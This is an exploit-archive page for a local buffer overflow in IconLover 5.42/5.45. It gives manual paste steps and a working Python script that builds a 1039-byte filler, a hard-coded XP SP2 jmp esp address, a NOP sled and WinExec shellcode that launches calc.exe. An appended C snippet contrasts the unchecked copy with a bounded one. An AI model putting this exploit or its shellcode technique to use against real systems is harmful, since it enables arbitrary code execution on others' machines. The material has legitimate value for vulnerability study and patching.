IconLover 5.42 - Local Buffer Overflow Exploit
Source: cor3sm4sh3r[at]gmail.com  Author: cor3sm4sh3r  Published: 2015-09-30
# Exploit Title: IconLover v5.42 Buffer Overflow Exploit
# Date: 29/09/2015
# Exploit Author: cor3sm4sh3r
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r
# Category: Local
# Tested on: Windows XP Professional SP2
 
 
'''
Credits & Authors:
==================
ZwX (http://zwx.fr/)
[http://www.vulnerability-lab.com/show.php?user=ZwX]
 
#References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1609
 
Affected Product(s):
====================
AHA-Soft
Product: IconLover - Software (Windows) 5.42 and 5.45
 
 
Manual steps to exploit...
1. Copy the content of exploit.txt to your clipboard
2. Run the IconLover.exe software
3. Click the File -> New Icon Library option
4. Click the Library and push the Download button
5. Paste the AAAA+... string into the Website Address (URL) input, click OK and then Hide
6. Successful exploitation will open an instance of calc.exe!
  
'''
 
 
#!/usr/bin/env python
# Payload bytes are written as bytes literals to a file opened in binary mode,
# so the script produces the same exploit.txt under Python 2 and Python 3
# (a text-mode write under Python 3 would UTF-8-encode bytes above 0x7f).
#badchars = "\x00\x0a\x0d"
junk  = b"\x41" * 1039
eip  = b"\xed\x1e\x94\x7c"    #jmp esp 7c941eed ntdll.dll ( XP sp2 )
nopsled = b"\x90"*20

shellcode  = b"\x33\xc0"             #=> XOR EAX,EAX          |  Zero out EAX register
shellcode += b"\x50"                 #=> PUSH EAX             |  Push EAX to have null-byte padding for "calc.exe"
shellcode += b"\x68\x2E\x65\x78\x65" #=> PUSH ".exe"          |  Push the ASCII string to the stack
shellcode += b"\x68\x63\x61\x6C\x63" #=> PUSH "calc"          |
shellcode += b"\x8B\xC4"             #=> MOV EAX,ESP          |  Put a pointer to the ASCII string in EAX
shellcode += b"\x6A\x01"             #=> PUSH 1               |  Push uCmdShow parameter to the stack
shellcode += b"\x50"                 #=> PUSH EAX             |  Push the pointer to lpCmdLine to the stack
shellcode += b"\xBB\x4d\x11\x86\x7C" #=> MOV EBX,7C86114d     |  Move the pointer to WinExec() into EBX
shellcode += b"\xFF\xD3"             #=> CALL EBX
shellcode += b"\x33\xc0"             #=> XOR EAX,EAX          |  Zero out EAX register
shellcode += b"\x50"                 #=> PUSH EAX             |  Push EAX
shellcode += b"\xBB\xa2\xca\x81\x7c" #=> MOV EBX,7C81caa2     |  Exit process
shellcode += b"\xFF\xD3"             #=> CALL EBX

packet = junk + eip + nopsled + shellcode + nopsled

# Write the payload so that step 1 above can copy it to the clipboard
with open('exploit.txt', 'wb') as f:
    f.write(packet)
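The layout above (1039 bytes of filler, a 4-byte return address, a NOP sled, then shellcode) only works because the pasted URL is copied into a fixed-size buffer with no length check. As an added illustration that is not part of this advisory and not IconLover's code, the C below shows that bug class beside a bounded version and feeds the bounded version the advisory's 1039-byte filler; URL_MAX, the function names and the sample URL are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* URL_MAX is a constructed size; the advisory does not give IconLover's real
 * buffer size, only that 1039 filler bytes reach the saved return address. */
#define URL_MAX 64
#define ADVISORY_JUNK_LEN 1039
/* Vulnerable pattern (hypothetical, not IconLover's code): the pasted URL is
 * copied into a fixed stack buffer with no length check, so any input of
 * URL_MAX bytes or more runs past buf into the saved frame and return address. */
int save_url_unchecked(const char *url)
{
    char buf[URL_MAX];
    strcpy(buf, url);            /* unbounded copy: the defect */
    return (int)strlen(buf);
}

/* Hardened form: measure with a bound, refuse anything that does not fit
 * together with its terminator, and copy only what was measured. */
int save_url_checked(const char *url, char *out, size_t out_len)
{
    size_t n = 0;
    if (url == NULL || out == NULL || out_len == 0)
        return -1;
    while (n < out_len && url[n] != '\0')
        n++;
    if (n >= out_len)            /* overlong or unterminated: reject */
        return -1;
    memcpy(out, url, n + 1);     /* n + 1 <= out_len, terminator included */
    return (int)n;
}

/* Runs the advisory's 1039 x 'A' filler through the checked copy and returns
 * the verdict, so the rejection is observable without corrupting any stack. */
int checked_result_for_advisory_junk(void)
{
    static char junk[ADVISORY_JUNK_LEN + 1];
    char out[URL_MAX];
    memset(junk, 'A', ADVISORY_JUNK_LEN);
    junk[ADVISORY_JUNK_LEN] = '\0';
    return save_url_checked(junk, out, sizeof out);
}

int main(void)
{
    char out[URL_MAX];
    printf("short URL -> %d\n", save_url_checked("http://example.com/a.ico", out, sizeof out));
    printf("1039 x 'A' -> %d\n", checked_result_for_advisory_junk());
    return 0;
}
```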
 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved